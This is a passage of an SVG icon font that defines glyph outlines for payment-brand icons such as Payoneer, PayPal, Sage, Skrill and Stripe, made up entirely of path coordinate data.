<glyph glyph-name="payoneer-alt" horiz-adv-x="1000" unicode="&#xecdc;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-523-231c5 3 8-2 11-6 17-18 25-39 25-66 0-10-2-20-5-31-1-2-2-5-3-6-3-5-5-5-8 0-4 6-4 13-5 20-6 26-12 52-16 78 0 4-2 9 1 11z m-156-140c-13 0-13 0-15-13-2-9-4-18-5-26-1-5-3-7-8-7-5 1-10 1-15 0-4 0-5 1-4 5 6 34 13 67 19 101 1 5 2 10 3 15 1 4 2 6 5 6 16 3 32 4 48 1 14-3 25-10 29-25 4-16-1-31-13-42-12-12-28-15-44-15z m119-46c-4 0-5 1-5 5 1 4 1 8 0 13-4-5-7-9-10-12-18-16-45-7-49 16-1 7-1 14 0 22 7 33 33 53 68 51 8 0 16-1 24-2 4-1 5-3 4-8-4-18-7-36-10-55-2-8-3-16-2-25 0-3-1-5-5-4-5 0-10 0-15-1z m46-22c-7-11-12-23-18-35-1-2 0-5-4-4-2 0-4 2-5 4-1 3-1 6 0 10 6 27 18 51 33 74 36 56 80 104 134 143 9 6 17 11 26 16 1 0 2 1 3 1l0 0c1 1 3 2 4 2s2 1 3 2l2 1c1 0 2 1 3 1 1 1 2 1 3 1l2 1 4 2c1 0 2 0 4 1 0 0 1 0 1 0 1 1 2 1 3 1l2 1c0 0 1 0 1 0 18 5 32 4 40 1 5-2 10-3 14-7l0 0c3-3 6-5 8-8 3-4 3-7-3-9-5-1-10-2-15-3-67-12-121-45-166-95-30-31-57-64-79-101z m124 20c-24 0-39 16-39 39 0 28 17 51 43 57 4 1 9 1 11 1 27 0 43-16 42-41-2-33-25-56-57-56z m147 6c0-3-2-4-5-4-6 0-12 1-18 0-3 0-4 1-3 5 3 15 5 31 8 46 1 4 1 8 1 12 0 4 0 8-4 10-5 2-9 1-13-1-8-5-12-13-14-22-4-15-7-29-9-43-1-5-3-7-8-7-5 1-10 1-16 1-3-1-4 0-4 4 6 28 11 56 16 84 0 3 2 5 6 5 0-1 0 0 1 0 5 0 11 1 15-1 5-2-1-9 2-14 4 4 8 8 13 11 8 5 17 6 26 5 11-2 19-13 18-27-2-21-8-43-12-64z m95 40c-12-6-25-7-39-8-2 0-6 2-7-1-1-3 0-6 2-9 4-4 9-7 15-7 9 0 17 0 26 4 3 1 5 1 5-3-1-2 0-3 0-5 1-10 1-11-10-13-11-3-21-5-32-3-22 4-32 16-32 39 0 27 17 50 42 56 9 2 17 2 26-1 10-3 17-10 18-21 2-13-3-22-14-28z m87-2c-11-5-24-5-36-6-6 0-7-1-4-7 3-7 8-9 15-10 9-1 18 0 26 3 4 2 5 1 6-3l0-10c0-3-1-4-3-5-16-6-32-8-48-3-14 4-21 14-23 29-2 14 1 27 8 39 11 17 25 26 42 26 13 0 23-2 30-9 13-15 7-37-13-44z m92 42c-1-9-2-16-14-16-8 0-12-7-16-13-7-11-7-24-10-36-1-6 0-14-4-17-5-4-13-1-19-2-6 0-8 1-6 8 5 26 11 52 13 79 0 5 2 8 7 7 2-1 3 0 5 0 13 0 13 0 11-14 0-1-1-3 1-5 3 4 6 8 9 11 6 6 13 10 21 9 3 0 5 0 3-4 0-2-1-4-1-7z m-693 24c-5 1-10 0-15 0-3 0-4-2-4-5-2-9-4-19-6-29-1-5 1-6 5-6 2 0 3 0 5 0 7-1 13 1 19 5 7 5 11 14 9 23-1 7-6 10-13 12z m91-33c-4-1-8-4-11-7-9-9-14-19-15-31 0-3 0-5 1-6 2-11 10-15 19-9 5 3 8 8 10 13 5 9 6 19 8 29 2 11-1 13-12 11z m193 0c-6 0-11-4-14-9-7-8-9-18-9-29-1-9 4-15 10-17 7-3 15 0 20 7 7 8 9 18 10 26 0 16-6 23-17 22z m210 1c-11 0-20-7-23-16-1-2 0-5 3-4 7 1 15 0 22 3 5 1 8 4 7 10-1 6-5 7-9 7z m91 0c-10 0-20-8-22-16-1-3 0-5 3-4 7 1 14 0 21 2 5 2 9 5 8 11-1 6-5 7-10 7z" />
<glyph glyph-name="payoneer" horiz-adv-x="1000" unicode="&#xecdd;" d="M603 486c6 1 13 2 20 4 7 2 8 6 3 12-2 4-6 7-10 10 0 0 0 0-1 0-5 5-11 7-17 9-12 4-29 5-54-1l-1 0-2-1-4-1-2-1c-2 0-3-1-4-1-2-1-5-2-7-3l-2-1-3-1c-2-1-3-1-5-2l-2-1c-1-1-3-1-4-2l-5-3-1 0c-1 0-2-1-3-2-12-6-23-13-34-21-72-50-131-114-178-188-19-30-35-62-43-98-1-4 0-8 1-12 1-3 3-6 6-6 5-1 4 3 6 5 7 16 14 32 23 47 29 49 65 91 103 133 60 65 132 109 220 125z m-466-93c-4 19-19 28-37 32-21 4-42 3-63-1-5 0-7-3-7-7-1-7-3-14-4-21-9-44-17-88-26-132-1-6 1-7 6-7 6 0 13 1 20 0 7-1 9 3 10 8 2 12 4 24 6 35 4 17 4 17 21 17 21 1 41 5 57 20 16 15 22 34 17 56z m-47-41c-8-5-16-7-24-6-3 0-5 0-7 0-6 0-8 1-7 8 3 13 5 26 8 39 0 3 1 6 5 6 7 0 14 1 21 0 8-2 15-7 17-16 2-12-3-24-13-31z m155-89c0 11 1 22 3 33 4 24 9 49 14 73 1 5 0 8-6 9-10 3-21 4-31 4-46 2-80-24-89-68-3-10-3-19-1-29 6-30 40-41 64-20 5 4 9 9 14 15 2-7 1-12 0-17 0-5 1-6 6-6 7 0 13 0 20 0 5 0 7 2 6 6z m-24 78c-3-13-4-26-10-38-4-7-7-13-14-17-11-8-23-3-26 11 0 2 0 5 0 9 1 15 7 29 19 40 4 5 9 7 15 9 15 3 18 0 16-14z m242 41c-3 0-9 0-14-2-34-8-57-38-57-74 0-31 20-52 51-52 42 0 73 30 75 73 1 33-19 55-55 55z m6-90c-8-10-17-13-27-10-8 3-14 12-14 23 1 14 4 27 13 39 4 6 10 11 18 11 14 2 22-8 22-29 0-10-4-23-12-34z m161 89c-12 2-24 1-35-6-7-4-11-9-17-14-5 6 4 15-3 18-5 2-13 0-20 1 0 0-1-1-1 0-6 0-7-2-8-7-7-37-13-73-20-110-1-5 0-6 5-6 7 0 14 0 21 0 6 0 9 1 10 8 3 19 7 38 11 57 3 12 9 22 19 29 6 3 11 4 17 1 5-3 6-8 6-13-1-6-1-11-2-16-4-20-7-40-11-60-1-5 0-6 5-6 8 0 16 0 24 0 3 0 6 0 6 4 5 29 12 56 15 85 2 18-8 33-22 35z m127-2c-11 4-23 4-34 1-34-8-56-38-56-74 0-30 13-46 42-51 15-3 29 0 43 3 14 4 14 4 12 18 0 2 0 4 0 6 0 6-2 6-7 4-10-4-21-5-33-4-8 0-14 3-20 9-2 4-4 8-3 12 2 3 7 1 10 2 17 0 35 1 51 10 15 7 21 19 19 36-2 15-11 24-24 28z m-19-45c-9-4-19-3-29-4-4-1-5 2-4 5 4 12 17 22 31 22 5-1 11-2 12-10 1-7-4-11-10-13z m116 48c-22-1-41-13-55-34-10-16-13-34-11-52 3-19 12-33 31-39 21-6 42-3 63 4 3 2 5 4 4 7 0 5 0 9 0 13-1 5-3 7-8 5-11-5-22-5-34-4-9 0-16 4-20 13-4 8-3 10 6 10 16 0 32 1 47 6 26 10 34 39 17 58-10 10-22 13-40 13z m5-49c-9-3-19-2-29-3-3-1-4 1-4 5 3 11 17 22 30 22 6 0 12-2 13-10 1-8-4-11-10-14z m136 49c-11 0-20-4-28-12-4-4-8-9-12-15-2 3-1 5-1 7 3 18 3 18-15 18-2 0-4-1-6 0-6 1-9-3-9-9-2-35-11-70-18-104-1-9 1-11 9-10 8 1 18-3 24 2 6 5 4 15 6 23 4 16 5 32 13 47 5 8 11 17 21 17 16 0 17 10 19 21 0 3 1 6 1 9 2 5 0 6-4 6z m-708 2c2-9 3-18 7-26 4-6 7-6 11-1 2 3 3 6 4 9 4 14 6 28 6 41 1 35-11 63-32 87-4 5-9 11-15 8-4-3-2-10-1-15 5-35 13-69 20-103z" />
<glyph glyph-name="paypal-alt" horiz-adv-x="1000" unicode="&#xecde;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-578-335c-10-5-22-8-34-10-7 0-14 0-22 0-6 0-9-4-11-10-2-9-4-19-7-29-1-4-5-7-9-7-7-1-14-1-21 0-4 0-7 3-6 7l17 72 12 53c1 5 5 8 10 8h29c7 0 16 1 25 0 9-1 19-2 27-6 11-6 17-15 18-26 1-10 0-18-4-27-5-11-13-19-24-25z m130-3c-4-15-7-30-11-45-1-5-5-9-10-9-6 0-11 0-16 0-6 0-9 3-7 9 0 1 0 1 0 3-3-2-5-4-8-5-11-8-24-11-38-9-14 2-24 14-23 28 1 10 4 19 12 26 5 5 12 8 18 10 8 3 17 4 25 5 8 1 16 2 24 3 3 0 4 1 4 3 0 6-3 10-8 12-8 2-16 2-24 1s-16-3-23-5c-4-2-6 0-5 4 0 4 1 9 3 13 1 4 4 7 9 8 14 3 28 4 42 3 9 0 18-1 27-5 9-4 15-13 14-23-1-9-3-18-5-27z m122 26c-7-12-14-24-21-36l-30-50c-6-11-13-22-19-34-2-3-5-6-8-7-2-2-5-2-7-2-3 0-7 0-10 0h-11c-3 0-5 2-4 5 1 4 4 7 6 11 4 7 8 15 13 22 1 3 1 7 1 10-2 15-5 31-8 47-3 18-6 36-9 54-1 5 1 8 6 8h16c9 0 12-3 14-11l8-51c0-1 0-2 2-2s1 0 2 1l27 47 4 7c4 6 9 9 16 9s14 0 21 0c5 0 5-2 4-5-1-3-3-6-5-9-3-5-5-9-8-14z m120-23c-13-7-27-10-42-11-5 0-10 0-15 0-4 0-8-3-10-8-2-10-4-19-6-29-2-6-6-9-11-9h-19c-6 0-8 3-7 8l8 37c6 26 12 52 18 78 1 3 2 7 3 10 1 5 5 8 10 8h30c7 0 18 0 28-1 9-1 19-2 27-8 9-6 14-15 14-25 2-23-8-39-28-50z m130-2c-4-16-7-31-11-46-1-6-5-9-11-9h-15c-6 0-9 3-7 9 0 1 0 1 0 2-3-2-6-3-8-5-12-8-25-11-38-8-15 2-24 15-23 30 2 17 12 27 27 33 9 3 19 5 29 6 8 1 16 2 24 3 2 0 3 1 3 3 0 6-2 10-9 11-8 3-16 3-25 2-7-1-14-3-21-6-4-1-6 1-5 5 0 4 2 9 3 13 2 5 6 7 11 8 15 3 30 4 45 3 6 0 13-1 19-4 13-4 18-13 17-27-1-8-3-15-5-23z m64 49l-16-71-5-25c-1-4-5-8-10-8-3 0-6 0-9 0h-8c-6 0-9 3-7 9l5 23c5 23 10 46 15 69 2 10 5 21 7 31 1 5 5 8 10 8h18c5 0 7-3 6-8-2-9-4-19-6-28z m-217 10c-6 1-12 1-19 1-4 0-8-4-9-8-2-9-4-18-6-27-1-3 1-6 4-7 2-1 5 0 7 0 5 0 11 0 16 2 10 3 18 9 19 20 2 10-3 17-12 19z m-370 0c-5 1-10 2-15 1h-4c-5 0-9-3-11-7-2-9-4-18-6-27-1-4 2-8 6-8 7 0 14 0 21 2 11 3 19 10 20 22 0 8-3 14-11 17z m486-64c-5-1-9-1-14-1-5-1-10-2-15-4-8-3-11-8-11-16 0-4 2-6 5-8 3-1 7-1 10-1 6 0 12 2 18 5 2 1 4 3 4 5 2 6 3 12 5 18 0 2-1 2-2 2z m-372 0c-4 0-8-1-11-1-6-1-12-2-17-4-8-2-12-8-12-15 0-5 2-8 6-9 3-1 6-1 9-1 7 0 13 3 19 6 2 1 3 3 3 4 2 6 3 12 5 18 0 2-1 2-2 2z" />
<glyph glyph-name="paypal" horiz-adv-x="1000" unicode="&#xecdf;" d="M748 439c-1 15-8 28-21 37-12 8-26 11-40 12-15 2-30 1-40 1h-44c-8 0-14-5-16-12-1-4-2-9-3-14l-26-114-13-54c-1-8 2-12 11-12h27c8 0 14 5 16 12 3 15 7 29 10 44 2 6 8 11 14 11 8 0 15 0 22 0 22 2 43 5 62 16 29 16 43 40 41 73z m-57-17c-3-17-13-26-28-30-8-2-16-3-24-3-3 0-6 0-10 1-4 1-7 5-6 10 3 13 6 26 9 40 2 6 7 11 14 11 9 0 17 0 26-2 15-3 21-13 19-27z m-488 20c-2 17-11 30-26 38-13 6-27 8-41 9-13 1-26 1-36 1h-42c-8 0-14-5-16-13l-17-77c-9-35-17-70-25-105-1-7 3-12 10-12 9 0 19 0 29 0 7 0 13 5 15 12 3 14 6 28 10 42 2 9 7 14 16 14 11 0 21 0 32 1 17 2 34 6 50 15 15 8 28 20 35 36 6 12 7 25 6 39z m-57-17c-1-18-13-28-28-32-10-3-21-4-31-3-6 0-10 5-9 12 3 12 6 25 9 38 2 7 8 12 15 12h7c8 0 14-1 21-3 12-3 17-12 16-24z m399 16c-11 0-21 0-32 0-10 0-17-5-22-13-3-3-4-7-6-10l-41-69c0-1-1-3-3-3s-2 2-2 4c-4 25-8 49-12 74-2 12-8 17-20 17h-24c-7 0-11-5-9-12l14-80c3-22 8-45 11-68 0-5 1-10-2-14-6-11-12-22-18-33-3-5-7-10-9-16-2-4 1-7 6-7h16c5 0 9 0 14 0 4-1 8 1 11 3 5 2 8 6 11 11 9 16 19 32 29 49l44 74c10 17 20 35 30 52 4 7 8 14 13 21 2 4 5 8 6 13 1 4 1 7-5 7z m334-4c-9 3-18 5-27 5-22 2-44 0-66-4-7-1-14-4-16-12-2-6-4-13-5-19-1-6 2-9 7-7 10 4 21 6 32 8 12 2 24 2 37-2 9-2 13-8 12-16 0-4-1-5-5-5-11-1-23-2-35-4-14-2-29-4-42-10-22-8-36-22-39-47-3-22 10-41 32-45 20-3 39 1 56 12 4 3 8 6 12 8 0-1 0-2 0-3-2-9 2-13 10-13h23c8 0 14 5 16 13 5 22 11 44 16 67 2 11 6 23 7 35 2 19-6 33-25 39z m-34-84c-2-9-4-18-6-27-1-3-4-5-7-6-8-5-16-9-26-9-5 0-10 1-14 2-6 2-8 6-8 12-1 11 5 19 16 23 7 3 15 5 23 6l19 2c3 0 4-1 3-3z m-507 82c-12 6-25 7-38 8-21 1-42-1-62-5-7-2-12-6-14-12-2-7-3-13-4-19-1-6 1-9 7-7 11 4 22 7 34 8 12 2 23 1 35-2 8-2 13-7 12-16 0-4-1-5-5-5-12-1-24-2-36-4-12-2-24-4-36-8-10-3-20-8-28-15-11-10-15-22-16-37-2-21 13-39 34-42 20-2 39 2 56 13 3 3 6 5 10 7 0-1 0-2 0-3-2-8 2-13 10-13 8 0 16 0 24 0 7 0 13 5 15 12 5 22 10 45 15 67 3 13 7 26 8 39 1 16-6 28-21 34z m-38-82c-2-9-4-17-6-26-1-3-3-5-5-6-8-5-18-10-28-10-5 0-9 1-13 2-7 2-9 6-9 13 0 11 5 19 17 23 8 3 17 4 26 5l15 2c3 0 3 0 3-3z m690 135h-26c-7 0-13-5-15-12-3-15-6-30-10-45l-22-101-8-35c-1-7 3-12 11-12h12c4 0 9 0 13 0 7 0 13 5 15 12l8 37 23 103c3 14 6 28 9 42 1 6-3 11-10 11z" />
<glyph glyph-name="sage-alt" horiz-adv-x="1000" unicode="&#xece0;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m9-346c0-1 0-2 0-3h-151c0-4 0-7 0-11 4-19 16-31 37-35 28-5 53 1 76 18 0 0 1 1 2 1l32-23c-35-40-116-54-166-12v-6c0-14 0-27-4-41-8-26-26-45-52-54-48-18-93-11-133 23-1 0-2 1-3 3 13 8 25 17 38 26 11-9 22-16 35-18 16-3 33-2 48 7 13 7 20 18 21 33 1 9 0 17 0 26-40-31-81-32-124-4v-20h-48v21c-1 0-2 0-2-1-9-12-22-17-36-18-20-3-41-3-61 3-12 3-20 8-33 18-4-2-9-5-13-8-16-8-33-12-51-14-26-2-51 0-75 9-18 6-34 15-48 26-1 1-1 1-2 2 11 10 22 19 34 29 9-8 20-15 32-20 23-8 46-10 70-4 6 1 11 4 16 8 6 4 9 11 8 19-1 9-7 13-14 15-8 2-17 3-25 4-16 1-32 2-48 4-18 3-34 10-46 24-21 26-14 65 15 83 12 8 26 13 40 14 30 5 60 2 89-9 7-2 13-6 20-10 2-1 3-1 5 1 14 12 30 17 48 19 20 2 41 2 61-2 26-4 36-10 55-29 16 21 38 31 64 32s49-7 69-25v23h49v-23c2 1 3 2 4 3 16 13 35 20 56 22 22 2 42-2 62-12 27-15 43-38 49-69 2-15 1-30 0-45z m-395 0c-21 0-41 0-61 0-10 0-19-2-28-7-13-8-15-25-3-35 4-3 10-6 15-8 19-5 38-4 57 0 10 1 17 7 20 16 4 11 2 22 3 33-2 1-2 1-3 1z m-15 82c-7 2-15 3-23 4-14 1-28 1-41-5-9-3-17-8-25-13-6 6-13 13-21 20-6-7-13-14-21-21 0 1-1 1-2 2-24 14-50 20-77 16-7 0-14-2-20-7-10-7-14-26 3-33 4-1 7-3 10-3 15-1 30-3 44-4 23-1 44-4 62-19 5 2 9 6 13 8 16 8 32 10 49 10l62 0c4 0 5 1 5 4-1 6 0 12 0 18-1 13-6 20-18 23z m164-2c-22 9-43 6-63-8-8-7-13-16-13-27 0-17 0-34 0-51 0-11 3-22 13-30 19-15 49-17 69-5 11 7 19 17 19 30 1 10 0 20 0 29h1c0 8 0 15 0 22 0 19-9 32-26 40z m118 0c-16-10-23-26-23-46h114c2 14-5 31-16 40-19 18-52 20-75 6z" />
<glyph glyph-name="sage" horiz-adv-x="1000" unicode="&#xece1;" d="M998 447c-7 44-30 77-69 97-27 15-56 19-86 16-29-2-55-12-78-30-1-2-3-2-6-4v32h-68v-32c-28 26-60 37-96 35s-68-15-91-44c-26 26-41 34-77 40-28 5-56 5-85 2-25-3-48-10-67-26-3-2-4-2-7-1-10 5-19 10-29 14-40 15-81 18-123 13-20-3-39-9-56-20-41-26-51-81-21-117 16-20 39-29 64-33 22-3 44-4 66-6 12-1 24-3 35-5 11-3 18-10 20-21 2-12-2-21-11-28-7-5-14-9-22-11-33-8-66-5-99 7-16 6-31 15-45 27-15-13-31-27-47-40 1-1 2-2 3-3 20-16 43-28 67-37 34-12 70-15 106-12 25 2 49 8 71 20 6 3 12 7 18 11 18-14 30-21 47-26 28-8 56-8 85-4 19 2 37 9 50 26 0 1 1 0 2 1v-30h69v29c59-40 116-38 173 5 0-12 0-24 0-35-1-22-12-38-30-48-21-11-44-14-67-9-19 3-34 12-49 25-18-13-36-25-53-37 1-1 3-3 4-4 56-47 118-57 186-32 36 14 61 39 72 77 6 18 6 38 6 57v8c71-59 183-39 232 16l-45 33c-1 0-2-1-2-2-32-23-67-32-106-25-29 5-47 22-52 50-1 4 0 9-1 15h212c0 1 1 3 1 4 0 20 3 41-1 62z m-552-109c-4-14-14-21-28-24-27-4-54-5-80 1-8 2-16 6-22 11-16 14-13 38 5 49 12 7 25 9 39 10 28 0 57 0 85 0 1 0 2-1 4-1 0-15 2-31-3-46z m-3 98c-29 1-58 0-88 1-23 0-46-3-67-14-7-4-12-8-19-12-24 22-55 26-86 28-21 1-41 3-62 5-5 0-9 2-14 4-24 10-19 37-4 47 8 6 17 8 27 10 39 5 75-4 108-24 1-1 3-1 4-2 10 10 19 20 29 29 10-10 20-19 29-27 12 6 23 13 35 18 18 7 38 8 57 6 11-1 22-2 32-5 18-5 25-15 25-33 0-8 0-16 0-24 0-5-1-7-6-7z m248-25h-1c0-14 0-27 0-41-1-19-12-32-27-42-29-17-71-14-97 7-13 11-18 26-18 42-1 24-1 48 0 72 0 15 6 27 18 36 28 20 57 24 88 11 24-10 37-28 37-55 0-10 0-20 0-30z m255 22h-159c0 27 9 49 32 64 32 20 78 16 105-8 15-13 25-38 22-56z" />
<glyph glyph-name="skrill-alt" horiz-adv-x="1000" unicode="&#xece2;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-485-389c-2-20-13-33-30-42-12-5-24-8-36-8-22-1-43 1-64 6-1 0-1 0-2 1v40c4-1 8-3 12-4 13-4 27-6 41-6 7 1 14 2 21 6 5 3 7 9 5 15-1 5-6 8-11 9-6 0-11 1-16 1-13 2-25 6-36 13-13 10-20 23-19 40 0 22 12 40 33 49 14 5 29 7 44 6 15 0 29-2 44-7 2 0 5-1 7-2 0 0 1-1 1-2 0-12 0-25 0-38-7 3-13 5-20 7-13 3-26 6-39 5-5 0-10-1-14-3-5-3-7-7-7-12 1-5 3-9 8-11 4-2 9-2 14-2 17-2 33-5 46-16 15-11 21-27 18-45z m138 77c-7-21-17-40-30-57-2-2-2-3-1-5 10-17 19-35 26-53 1-3 2-6 3-9 0 0 0-1 0-1h-3c-17 0-34 0-51 0-2 0-2 0-3 2-4 16-9 30-17 44 0 1-1 2-1 3 0 0-1 1-1 1v-50h-47v165c15 3 31 6 46 9v-90c1-1 1-1 1-1 0 1 0 1 1 2 10 12 18 26 24 41 0 1 1 1 2 1h50c0 0 1 0 2 0 0-1-1-2-1-2z m83-34c-3 0-7 0-10-1-12-2-18-8-19-21 0-8-1-16-1-24 0-14 0-28 0-42v-3h-45c0 0 0 1 0 1 0 26 0 51 0 76 0 13 4 25 13 34 8 8 17 13 28 15 10 3 21 3 31 3 1 0 2-1 3-1v-37z m59-91c-1 0-1 0-2 0h-41c-2 0-2 0-2 2 0 41 0 82 0 123 0 1 0 1 0 2h45v-127z m-23 142c-11 0-21 8-22 20 0 0 0 1 0 2 0 2 0 4 1 6 0 0 0 1 0 2l1 1c0 2 1 3 2 5 4 5 11 9 18 9 13 0 23-10 23-23 0-12-10-22-23-22z m88-142c-1 0-2 0-2 0-14 0-27 0-41 0-2 0-2 0-2 2v162c0 2 1 2 2 2l42 8h1v-174z m66 0h-45v163c0 2 1 3 3 3 14 3 28 5 41 8h1v-174z" />
<glyph glyph-name="skrill" horiz-adv-x="1000" unicode="&#xece3;" d="M237 413c-12 4-24 8-36 12-24 6-48 10-73 9-8-1-17-2-24-6-9-5-13-12-13-22 1-9 6-15 14-19 8-3 18-3 27-4 30-3 59-10 83-29 27-21 38-50 33-83-4-36-24-60-56-76-20-10-43-15-66-15-39-1-78 2-116 11-1 0-3 1-4 1v74c7-2 14-5 21-7 25-7 51-11 77-11 13 1 26 2 37 10 9 6 13 16 10 27s-11 15-21 17c-10 1-20 2-29 3-23 3-45 9-65 23-24 18-36 43-36 73 0 40 23 74 61 89 26 11 53 13 80 12 28-1 55-4 81-13 4-1 9-2 13-4 1 0 2-2 2-3 0-23 0-46 0-69z m34 72c28 6 56 11 85 17v-166l1 0c1 1 1 2 2 2 18 23 33 48 44 75 1 3 2 4 4 4 30-1 61-1 91-1 1 0 2 0 4 0-1-2-1-3-2-5-13-37-31-72-55-104-3-3-3-5-1-9 17-31 34-63 47-97 1-5 3-10 5-15 0-1 0-2 0-3h-4c-31 0-62 0-93 0-4 0-6 1-6 5-7 28-17 55-31 80-1 2-2 4-3 5-1 1-1 2-2 3v-93h-86c0 101 0 201 0 302z m729 17v-319h-83v5c0 98 0 196 0 294 0 4 1 5 5 6 26 4 51 9 76 14 1 0 1 0 2 0z m-122-319c-1 0-2 0-4 0-24 0-49 0-74 0-3 0-4 1-4 4 0 99 0 197 0 296 0 4 1 4 5 5 25 4 50 9 76 14 0 0 1 0 1 0 0-106 0-212 0-319z m-226 235v-67c-7-1-12-1-18-2-23-4-34-16-35-39-1-15-1-29-1-43 0-27 0-53 0-79v-5h-83c0 1-1 2-1 3 0 46 0 92 1 138 0 24 7 45 23 63 14 15 32 23 51 27 19 5 38 6 57 5 2 0 4 0 6-1z m25-2h83v-233c-2 0-3 0-4 0-25 0-50 0-74 0-4 0-5 1-5 4 0 75 0 150 0 225 0 1 0 2 0 4z m41 23c-22 0-40 18-40 41 0 22 18 41 41 41 22-1 40-18 40-41 0-23-18-41-41-41z" />
<glyph glyph-name="stripe-alt" horiz-adv-x="1000" unicode="&#xece4;" d="M847 696v0h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-578-417c-9-7-24-11-41-11-21 0-42 6-53 13l6 35c13-7 33-13 45-13 10 0 15 4 15 10 0 6-5 11-22 17-26 9-42 20-42 46 0 15 5 26 15 35 10 8 23 12 39 12 23 0 40-7 48-10l-6-36c-10 5-25 11-39 11-8 0-13-4-13-9 0-6 8-10 22-15 26-10 43-21 43-48 0-16-6-28-17-37z m99 27c5 0 11 2 14 3v-38c-1 0-2 0-2-1-5-1-13-2-23-2-1 0-2 0-3 0l-2 0h0l-1 0h-1c-1 0-1 0-1 0-1 0-1 0-1 0-1 0-1 0-2 0l0 0h-1c0 0 0 0 0 0-1 0-1 0-2 0 0 1-1 1-1 1l0 0-2 0c0 0-1 0-1 0l0 0-2 1 0 0s0 0 0 0c-1 0-1 0-2 0 0 0-1 1-1 1 0 0 0 0 0 0h0c-1 0-1 0-1 0l-1 0c0 1 0 1 0 1 0 0 0 0 0 0-1 0-1 0-1 0l0 0s0 0-1 0c0 0 0 0 0 0l-1 1 0 0-1 0 0 0s0 0-1 0 0 1 0 1c-1 0-1 0-1 0l-1 1s0 0 0 0c-1 0-2 1-2 1l-1 1-1 1s0 0 0 0c0 0 0 0 0 0l0 0-1 1-1 0c0 1 0 1-1 2l0 0s0 0 0 0l-1 1-1 1 0 0c0 1-1 1-1 2l0 0s0 0 0 1l-1 0 0 0s0 1 0 1v0l0 0c0 0-1 0-1 1l0 1s0 0 0 0c0 0 0 0 0 0v0s0 1 0 1l-1 0c0 1 0 1 0 1v0s0 1 0 1l-1 0s0 1 0 1l0 1-1 2c0 0 0 0 0 1 0 0 0 0 0 1l-1 2v0l0 1v0l0 2c-1 4-1 8-1 12v69h-20l5 33 1 0h0l1 0 13 3v0l5 33 1 0 0 1 0 2 41 7v-43h30l-6-36h-24v-62c0-11 4-16 13-16z m112 71c-4 0-6 0-9 0-11 0-20-2-26-10v-97h-47v150h41l3-18c0 0 0 0 0 0 5 13 15 20 29 20 2 0 4 0 6-1 0 0 0 0 0 0s1 0 1 0l1 0c0 0 0 0 1 0 0 0 0 0 0 0v-44z m59-107h-48v150h48v-150z m-24 165c-14 0-25 11-25 25 0 14 11 25 25 25 14 0 25-11 25-25 0-14-11-25-25-25z m171-112l0 0c0-1 0-2 0-2l0-1c0 0 0-1 0-1-1-1-1-2-1-3l0-1-1-2s0-1 0-2c-1 0-1-1-1-1 0 0 0 0 0 0 0-1 0-1-1-2l0 0c0-1-1-2-1-4l-1-1-1-3 0-1-2-3c-1-2-2-4-3-5-1-1-2-2-2-3s-2-2-3-3c0 0-1-1-1-1l-1-1c-1-1-2-2-3-3-1 0-1 0-1-1-1 0-2-1-3-2-2-1-4-2-6-3 0 0-1 0-1-1 0 0-1 0-1 0l0 0h-1s0 0 0 0l-1-1-1 0 0 0c-1-1-1-1-2-1-1 0-2-1-4-1s-3-1-4-1c-4-1-9-1-12-1-7 0-15 1-22 3v-48l-47-8v205h41l3-15c1 1 3 3 4 4 1 1 2 1 2 2s2 1 3 2l1 1 0 0c0 0 0 0 0 0s1 0 1 0l0 1s0 0 0 0h0s1 0 1 0l0 0c0 0 0 0 0 0h0c1 0 1 1 1 1 0 0 0 0 0 0l1 0 1 1 1 0 1 1 0 0 1 0c0 0 0 1 1 1 0 0 1 0 1 0 0 0 1 1 1 1l3 1c0 0 0 0 0 0 1 0 1 0 2 0 0 0 1 0 2 1l1 0c1 0 1 0 2 0l1 0 1 0 2 0h4s1 0 2 0c1 0 2 0 3 0l1 0 1 0s1 0 1-1c2 0 3 0 4-1 1 0 1 0 1 0 0 0 1 0 1 0l2-1c0 0 0 0 0 0l1 0 1-1s0 0 1 0l1 0c0 0 0-1 0-1l1 0c5-3 8-6 12-11 4-5 7-11 9-18 1-1 1-2 1-3 1-2 1-4 2-6 0 0 0-1 0-2 1-3 1-6 2-9 0-1 0-1 0-1v0c0-3 0-7 0-10v0c0-3 0-5 0-7v-4c0-3 0-6 0-9l0-1c0-1 0-2 0-4l-1-2c0-1 0-3 0-4 0-1-1-2-1-3z m138 7h-78c0-2 0-5 1-7 0 0 0-1 0-2 0 0 0 0 0 0l1-1 0 0c0-1 0-2 0-2 2-4 4-7 6-9 1 0 2-1 2-1 3-2 7-4 11-4l1 0s0 0 0-1l2 0 1 0h8c2 0 5 1 7 1h0l3 0c0 0 0 0 1 0 1 0 2 1 3 1 0 0 1 0 1 0 0 0 1 0 1 0 0 0 1 0 2 1 0 0 1 0 2 0l0 0 2 1 1 0 2 1c0 0 0 0 0 0 1 0 1 0 2 0 0 0 0 1 1 1 0 0 1 0 2 1 0 0 0 0 1 0h0l2 1 1 1 2 1v0l6-33c-3-1-5-3-8-4-1-1-2-1-3-1-1-1-3-2-5-2l-2-1 0 0-2 0c0 0 0-1 0-1-1 0-1 0-1 0-1 0-1 0-2 0h0c-2-1-3-1-5-1-1-1-2-1-3-1h-2c0 0-1 0-2 0h0c0 0 0 0-1 0 0 0 0-1 0-1l-2 0s-1 0-2 0c-4 0-7-1-11-1-2 0-3 0-5 1-1 0-2 0-3 0l-1 0s-1 0-2 0c0 0-1 0-1 0l-2 0s-1 0-2 0l-2 1-1 0-3 1-1 0c-1 0-1 0-2 0h0c-2 1-3 1-5 2-1 0-2 0-3 1l-1 0c-1 1-2 1-3 2-1 0-1 0-2 1-1 0-1 1-2 1-1 0-1 1-2 1-1 0-2 1-2 2l-2 1c-1 1-3 2-4 4-14 12-20 33-20 59 0 2 0 4 0 6 0 5 0 9 1 14 0 1 0 2 1 2l0 3c0 1 1 3 1 4v0l1 5c0 0 0 0 0 0 1 1 1 2 1 2 1 2 2 4 3 6 0 1 0 1 0 1l0 0c0 1 1 1 1 2l1 2c0 0 0 0 0 0 0 0 